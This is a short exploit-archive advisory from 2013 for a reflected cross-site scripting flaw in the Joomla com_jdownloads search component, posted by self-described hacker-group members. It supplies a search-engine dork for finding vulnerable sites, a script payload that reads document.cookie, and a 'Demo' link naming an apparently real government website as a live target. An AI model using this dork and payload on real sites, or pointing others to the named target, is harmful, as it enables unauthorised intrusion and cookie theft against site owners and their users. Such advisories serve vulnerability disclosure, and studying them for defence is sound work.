Joomla com_jdownloads Cross Site Scripting

2013.08.19
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

##################################### Title:com_jdownloads xss Vulnerability ##################### ############################################################## __ __ _____ _ ______ ______ _______ _____ | \/ | /\ | __ \| | | ____| ____|__ __/ ____| | \ / | / \ | | | | | | |__ | |__ | | | (___ | |\/| | / /\ \ | | | | | | __| | __| | | \___ \ | | | |/ ____ \| |__| | |____| |____| |____ | | ____) | |_| |_/_/ \_\_____/|______|______|______| |_| |_____/ ############################################################## #Author:Darksnipper & Dream.killer #Email:Darksnipper@live.com ##################################### #Home:- www.MadLeeTs.com ##################################### Vendor Link:Www.jdownloads.com Dork:-inurl:"component/jdownloads/search" Tested On:- Windows 7,Linux,Windows xp ###################################################################### #P.o.c http: //127.0.0.1/components/jdownloads/search payload <script>alert(document.cookie)</script> Demo:- http://dsya.goa.gov.in/component/jdownloads/search payload:- <script>alert(document.cookie)</script> ######################################################################## Greetz:Dream.killer,Soul~inj3ct0r,Error Haxor,Fazil Mir,Force-Ex,x3o-1337,Shadow008,1337,H4x0rl1f3,Invectus,Sahrawi Hacker,HaXor KaKKa,Retno Pro, Tr4ck3r,b0x,Gujjar Pcp,madc0de Haxor,P4k Command3r,Pain006,Anon DeXter,MindCracker,Ap3x Pr3d1at0r,Ment@l Mind,Sujit Ujale,All Madleets Members,Kashmiri Hackers & All Freedom Fighters. ########################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top